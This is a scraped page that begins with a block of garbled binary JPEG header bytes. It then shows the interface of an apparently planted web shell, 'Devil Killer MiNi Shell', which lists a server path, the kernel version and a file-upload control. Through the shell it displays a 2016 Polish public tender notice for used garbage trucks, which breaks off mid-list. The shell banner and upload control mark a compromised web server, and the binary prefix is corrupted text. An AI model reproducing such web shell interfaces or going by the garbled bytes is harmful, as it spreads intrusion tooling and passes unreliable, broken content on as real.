JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161106/337142-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://wikznin.pl/' target='_blank'>http://wikznin.pl/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 337142 - 2016
              z dnia 2016-11-06 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Żnin: Dostawa używanych samochodów ciężarowych przeznaczonych do zbierania i transportu odpadów komunalnych. <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zakład Wodociągów i Kanalizacji "WiK" Sp. z o.o., krajowy numer identyfikacyjny
              9111307000000, ul.
              ul. Mickiewicza 
              ,
              88400  
              Żnin, woj.
              kujawsko-pomorskie, państwo
              Polska, tel.
              52 302 09 13, e-mail
              , faks
              .
              <br />
              Adres strony internetowej (URL): http://wikznin.pl/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Jednoosobowa Spółka Gminy Żnin w formie spółki z ograniczoną odpowiedzialnością.</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://wikznin.pl/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://wikznin.pl/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa używanych samochodów ciężarowych przeznaczonych do zbierania i transportu odpadów komunalnych. <br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest dostawa 5 używanych samochodów ciężarowych przeznaczonych do zbierania i transportu odpadów komunalnych. Wykaz pojazdów:
3.1. Samochód ciężarowy przeznaczony do zbierania i wywozu odpadów komunalnych- śmieciarka jednokomorowa ze skrzynią ładunkową o pojemności nie mniejszej niż 16 m3 ale nie przekraczającej 18 m3- 2 szt. 
Wymagane parametry techniczne: 
PODWOZIE:
	dwuosiowe,
	rok produkcji 2006-2008,
	przebieg nie więcej niż 240 000 km,
	moc silnika minimum 240 kM,
	pojemność silnika minimum 6 174 cm3,
	dopuszczalna masa całkowita 18 000 kg,
	norma emisji spalin minimum EURO 4,
	blokada tylnego mostu,
	zawieszenie przedniej osi mechaniczne,
	zawieszenie tylnej osi pneumatyczne,
	automatyczna skrzynia biegów,
	zbiornik paliwa minimum 200 litrów,
	kabina dzienna, 3-osobowa,
	fotel kierowcy zawieszony pneumatycznie z regulacją,
	nowe opony R22.5,
	nowy akumulator,
	tachograf z polską legalizacją,
	belka sygnalizacyjna koloru pomarańczowego umieszczona na dachu kabiny,
	elektryczne lusterka,
	sygnał ostrzegawczy o cofaniu, 
	kamera cofania z tyłu zabudowy oraz monitor w kabinie, 
	lusterko szerokokątne po stronie kierowcy i pasażera,
	lusterko rampowe po stronie pasażera,
	pokrowce na fotele,
	gumowe dywaniki,
	ponadto: koło zapasowe, profesjonalny klucz do odkręcania kół, kliny pod koła, podnośnik dostosowany do pojazdu, gaśnica, trójkąt ostrzegawczy, kamizelki odblaskowe (2 szt.), apteczka,
	dokumentacja: komplet dokumentów wymagany przepisami prawa uprawniający do zarejestrowania samochodu, karta pojazdu, świadectwo spełnienia normy emisji spalin, książka serwisowa, instrukcja obsługi i konserwacji pojazdu w języku polskim, katalog części zamiennych w formie papierowej
Wymagane jest udzielenie gwarancji na podwozie oraz zabudowę przez okres minimum 3 miesięcy.
ZABUDOWA:z urządzeniem załadowczym tylnym, jednokomorowa, rok produkcji 2006-2008,skrzynia ładunkowa z gładkimi ścianami bocznymi, dno wanny zasypowej wykonane z blachy wysokogatunkowej o grubości minimum 5 mm,objętość skrzyni ładunkowej 16-18 m3 ,przystosowana do opróżniania pojemników plastikowych i metalowych o pojemności od 80 l do 1100 l,łapy do metalowych pojemników o pojemności 1100l,obsługa urządzeniami zasypowymi za pomocą przycisków elektrycznych,znajdujących się po obu stronach odwłoka,zawory spustowe do odprowadzania cieczy z odwłoków,sterowanie płytami wypychającymi na zewnątrz zabudowy oraz wewnątrz kabiny kierowcy,automatyczny przyspieszacz zwiększający obroty silnika podczas wciągania śmieci z wanny zasypowej,załączanie pompy do obsługi nie może kolidować z pracą podwozia, możliwość wciągania śmieci z wanny w trybie automatycznym,stopień zgniotu nie mniejszy niż 1:5,hydraulika po remoncie, bez wycieków, minimum dwa wyłączniki awaryjne umieszczone po obu stronach zabudowy,światło ostrzegawcze obrotowe z tyłu zabudowy,światło robocze,wysokość krawędzi zasypowej nie więcej niż 1300 mm,uchwyt na narzędzia, zasłony przeciwpyłowe, dwa stopnie dla operatorów. 
Pojazd musi być po całkowitym przeglądzie technicznym podwozia i zabudowy, wypiaskowany i polakierowany.
3.2. Samochód ciężarowy przeznaczony do zbierania i wywozu odpadów komunalnych- śmieciarka jednokomorowa ze skrzynią ładunkową o pojemności niemniejszej niż 14 m3 ale nie przekraczającej 16 m3- 1 szt. 
Wymagane parametry techniczne:  
PODWOZIE:
	dwuosiowe,
	rok produkcji 2006-2008,
	przebieg nie więcej niż 240 000 km,
	moc silnika minimum 240 kM,
	pojemność silnika minimum 6 174 cm3,
	dopuszczalna masa całkowita 18 000 kg,
	norma emisji spalin minimum EURO 4,
	blokada tylnego mostu,
	zawieszenie przedniej osi mechaniczne,
	zawieszenie tylnej osi pneumatyczne,
	automatyczna skrzynia biegów,
	zbiornik paliwa minimum 200 litrów,
	kabina dzienna, 3-osobowa,
	fotel kierowcy zawieszony pneumatycznie z regulacją,
	nowe opony R22.5,
	nowy akumulator,
	tachograf z polską legalizacją,
	belka sygnalizacyjna koloru pomarańczowego umieszczona na dachu kabiny,
	elektryczne lusterka,
	sygnał ostrzegawczy o cofaniu, 
	kamera cofania z tyłu zabudowy oraz monitor w kabinie, 
	lusterko szerokokątne po stronie kierowcy i pasażera,
	lusterko rampowe po stronie pasażera,
	pokrowce na fotele,
	gumowe dywaniki,
	ponadto: koło zapasowe, profesjonalny klucz do odkręcania kół, kliny pod koła, podnośnik dostosowany do pojazdu, gaśnica, trójkąt ostrzegawczy, kamizelki odblaskowe (2 szt.), apteczka,
	dokumentacja: komplet dokumentów wymagany przepisami prawa uprawniający do zarejestrowania samochodu, karta pojazdu, świadectwo spełnienia normy emisji spalin, książka serwisowa, instrukcja obsługi i konserwacji pojazdu w języku polskim, katalog części zamiennych w formie papierowej

Wymagane jest udzielenie gwarancji na podwozie oraz zabudowę przez okres minimum 3 miesięcy.

ZABUDOWA:z urządzeniem załadowczym tylnym, jednokomorowa, rok produkcji 2006-2008,skrzynia ładunkowa z gładkimi ścianami bocznymi, dno wanny zasypowej wykonane z blachy wysokogatunkowej o grubości minimum 5 mm,objętość skrzyni ładunkowej 14-16 m3 ,przystosowana do opróżniania pojemników plastikowych i metalowych o pojemności od 80 l-1100 l,łapy do metalowych pojemników o pojemności 1100 l,
obsługa urządzeniami zasypowymi za pomocą przycisków elektrycznych, znajdujących  się po obu stronach odwłoka,zawory spustowe do odprowadzania cieczy z odwłoków,
sterowanie płytami wypychającymi na zewnątrz zabudowy oraz wewnątrz kabiny kierowcy,automatyczny przyspieszacz zwiększający obroty silnika podczas wciągania śmieci z wanny zasypowej,załączanie pompy do obsługi nie może kolidować z pracą podwozia, możliwość wciągania śmieci z wanny w trybie automatycznym,stopień zgniotu nie mniejszy niż 1:5,hydraulika po remoncie, bez wycieków,  minimum dwa wyłączniki awaryjne umieszczone po obu stronach zabudowy,światło ostrzegawcze obrotowe z tyłu zabudowy,światło robocze,wysokość krawędzi zasypowej nie więcej niż 1300 mm,uchwyt na narzędzia,dwa stopnie dla operatorów. 
Pojazd musi być po całkowitym przeglądzie technicznym podwozia i zabudowy, wypiaskowany i polakierowany.
3.3. Samochód ciężarowy typu hakowiec wraz z HDS oraz kontenerem z siatki do selektywnej zbiórki odpadów- 1 szt. 
Wymagane parametry techniczne: 
PODWOZIE:
	dwuosiowe,
	rok produkcji 2006-2008,
	przebieg nie więcej niż 260 000 km,
	moc silnika minimum 180 kM,
	pojemność silnika minimum 4 580 cm3,
	dopuszczalna masa całkowita 11 990 kg,
	norma emisji spalin minimum EURO 4,
	pojemność zbiornika paliwa minimum 150 litrów,
	zawieszenie przedniej i tylnej osi mechaniczne,
	manualna skrzynia biegów,
	kabina dzienna, 2-osobowa,
	fotel kierowcy zawieszony pneumatycznie z regulacją,
	układ kierowniczy ze wspomaganiem, 
	nowe opony R17,5,
	nowy akumulator, 
	elektryczne lusterka,
	elektryczne szyby,
	lusterko szerokokątne po stronie kierowcy i pasażera,
	pokrowce na fotele,
	gumowe dywaniki ,
	ponadto: koło zapasowe, profesjonalny klucz do odkręcania kół, kliny pod koła, podnośnik dostosowany do pojazdu, gaśnica, trójkąt ostrzegawczy, kamizelki odblaskowe (2 szt.), apteczka,
	dokumentacja: komplet dokumentów wymagany przepisami prawa uprawniający do zarejestrowania samochodu, karta pojazdu, homologacje na pojazd skompletowany, decyzję Urzędu Dozoru Technicznego dopuszczającą pojazd do eksploatacji, świadectwo spełnienia normy emisji spalin, książka serwisowa, instrukcja obsługi i konserwacji pojazdu w języku polskim, katalog części zamiennych w formie papierowej.

Wymagane jest udzielenie gwarancji na podwozie przez okres minimum 3 miesięcy. 
ZABUDOWA:fabrycznie nowe urządzenie hakowe,rama zabudowy hakowej wykonana ze stali wysokogatunkowej o grubości minimum 6 mm,nominalna moc załadunkowa minimum 7 ton,wysokość haka minimum 1200 mm,możliwość obsługi kontenerów typu KP-7, szerokie rolki umożliwiające stabilny transport kontenera sterowanie jednoosobowe z zewnątrz i wewnątrz kabiny pojazdu,rozdzielacz hydrauliczny, blokada hydrauliczna kontenera, pompa hydrauliczna tłoczkowa, tylna belka najazdowa,skrzynka na narzędzia. 
Wymagane jest udzielenie gwarancji na zabudowę przez okres minimum 12 miesięcy.
HDS:używany żuraw zakabinowy,z dwoma wysuwami hydraulicznymi,sterowanie jednoosobowe z poziomu jezdni z obu stron pojazdu,z funkcją otwierania pojemników typu dzwon,węże hydrauliczne umieszczone wewnątrz kolumny,udźwig minimum 1300 kg,zasięg minimum 5100 mm.
Wymagane jest udzielenie gwarancji na zabudowę przez okres minimum 3 miesięcy. 

Kontener ze ścianami z siatki, wciągany na hak:fabrycznie nowy,hak na wysokości 1200 mm,długość minimum 4000 mm,szerokość minimum 2400 mm,wysokość 1500 mm, wzmocnienie w podłodze,przednia ściana pełna,ściana tylna oraz ściany boczne wykonane z siatki,zabudowa dzielona w połowie uchylną klapą, stanowiącą dwie niezależne komory z możliwością połączenia,
Pojazd musi być po pełnym przeglądzie serwisowo-olejowym, w pełni przygotowany do pracy.
3.4. Samochód ciężarowy typu hakowiec- 1 szt. 
Wymagane parametry techniczne: 
PODWOZIE:
	dwuosiowe,
	rok produkcji 2006-2008,
	przebieg nie więcej niż 220 000 km,
	moc silnika minimum 150 kM,
	pojemność silnika minimum 2 685 cm3,
	dopuszczalna masa całkowita nie przekraczająca 6 500 kg,
	norma emisji spalin minimum EURO 4,
	blokada tylnego mostu,
	pojemność zbiornika paliwa minimum 150 litrów,
	zawieszenie przedniej i tylnej osi mechaniczne,
	manualna skrzynia biegów,
	kabina dzienna, 2-osobowa,
	fotel kierowcy zawieszony pneumatycznie z regulacją,
	układ kierowniczy ze wspomaganiem, 
	nowe opony,
	nowy akumulator, 
	elektryczne lusterka,
	elektryczne szyby,
	lusterko szerokokątne po stronie kierowcy i pasażera,
	pokrowce na fotele,
	gumowe dywaniki ,
	ponadto: koło zapasowe, profesjonalny klucz do odkręcania kół, kliny pod koła, podnośnik dostosowany do pojazdu, gaśnica, trójkąt ostrzegawczy, kamizelki odblaskowe (2 szt.), apteczka,
	dokumentacja: komplet dokumentów wymagany przepisami prawa uprawniający do zarejestrowania samochodu, karta pojazdu, homologacje na pojazd skompletowany, decyzję Urzędu Dozoru Technicznego dopuszczającą pojazd do eksploatacji, świadectwo spełnienia normy emisji spalin, książka serwisowa, instrukcja obsługi i konserwacji pojazdu w języku polskim, katalog części zamiennych w formie papierowej.

Wymagane jest udzielenie gwarancji na podwozie przez okres minimum 3 miesięcy. 

ZABUDOWA:fabrycznie nowe urządzenie hakowe,
rama zabudowy hakowej wykonana ze stali wysokogatunkowej o grubości minimum 6 mm,
nominalna moc załadunkowa minimum 4 tony,wysokość haka minimum 1200 mm,
możliwość obsługi kontenerów typu KP-7, szerokie rolki umożliwiające stabilny transport kontenera,sterowanie jednoosobowe z zewnątrz i wewnątrz kabiny pojazdu,
rozdzielacz hydrauliczny, blokada hydrauliczna kontenera, pompa hydrauliczna tłoczkowa, tylna belka najazdowa,skrzynka na narzędzia. 
Wymagane jest udzielenie gwarancji na zabudowę przez okres minimum 12 miesięcy.
Pojazd musi być po pełnym przeglądzie serwisowo-olejowym, w pełni przygotowany do pracy. 
<br /><br /><b>II.5) Główny kod CPV: </b>34144511-3<br /><b> Dodatkowe kody CPV:</b>34144510-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                W zakresie kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów, Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku,<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wzakresie sytuacji ekonomicznej lub finansowej, Zamawiający uzna, że Wykonawca spełnia ten warunek jeżeli w postępowaniu wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia,<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                W zakresie zdolności technicznej lub zawodowej, Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał co najmniej 3 dostawy używanych samochodów ciężarowych przeznaczonych do zbierania i transportu odpadów komunalnych o podwoziu wyprodukowanym nie później niż w 2006 roku. <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.W celu wykazania spełnienia warunków przez Wykonawcę oraz podmioty udostępniające zasoby, o których mowa w rozdziale X SIWZ do oferty należy załączyć oświadczenie Wykonawcy o spełnieniu warunków udziału, którego wzór stanowi załącznik nr 2 do niniejszej SIWZ. 
2. W celu wykazania niepodlegania przez Wykonawcę wykluczenia, jak również podmiotów udostepniających zasoby oraz podwykonawców, wykluczenia z postepowania na podstawie art. 24 ust. 1 oraz art. 24 ust. 5 Wykonawca składa oświadczenie, którego wzór stanowi załącznik nr 3 do niniejszej SIWZ. 
3. Zamawiający, zgodnie z art. 24aa. Ustawy Pzp zastrzega sobie możliwość, że może najpierw 
dokonać oceny ofert, a następnie zbadać, czy Wykonawca, którego oferta została oceniona jako najkorzystniejsza, nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. 
4. W przypadku określonym w punkcie powyższym Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa poniżej:
4.1. w celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Zamawiający żąda:
